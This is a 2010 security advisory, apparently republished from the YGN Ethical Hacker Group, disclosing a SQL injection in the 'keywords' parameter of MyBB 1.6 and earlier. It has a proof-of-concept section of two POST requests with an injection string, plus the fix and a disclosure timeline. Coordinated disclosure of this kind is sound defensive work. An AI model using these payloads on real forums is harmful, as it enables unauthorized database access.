SecurityvulnsSECURITYVULNS:DOC:25399MyBB 1.6 <= SQL Injection Vulnerability
=================================
MyBB 1.6 <= SQL Injection Vulnerability
- OVERVIEW
Potential SQL Injection vulnerability was detected in MyBB.
- APPLICATION DESCRIPTION
MyBB is a free bulletin board system software package developed by the
MyBB Group.
It's supposed to be developed from XMB and DevBB bulletin board applications.
- VULNERABILITY DESCRIPTION
The "keywords" parameter was not properly sanitized in /private.php
and /search.php which leads to SQL Injection vulnerability.
Full exploitation possibility is probably mitigated by clean_keywords
and clean_keywords_ft functions in inc/functions_search.php.
- VERSIONS AFFECTED
MyBB 1.6 and lower
- PROOF-OF-CONCEPT/EXPLOIT
=> /search.php
POST /mybb/search.php
action=do_search&forums=2&keywords='+or+'a'+'a&postthread=1
=> /private.php
POST /mybb/private.php
my_post_key=&keywords='+or+'a'+'a&quick_search=Search+PMs&allbox=Check+All&fromfid=0&fid=4&jumpto=4&action=do_stuff
- SOLUTION
Upgrade to 1.6.1
- VENDOR
MyBB Development Team
http://www.mybb.com/
- CREDIT
This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.
- DISCLOSURE TIME-LINE
2010-12-09: notified vendor
2010-12-15: vendor released fixed version
2010-12-24: vulnerability disclosed
- REFERENCES
Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[mybb1.6]_sql_injection
About MyBB: http://www.mybb.com/about/mybb
#yehg [2010-12-24]
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd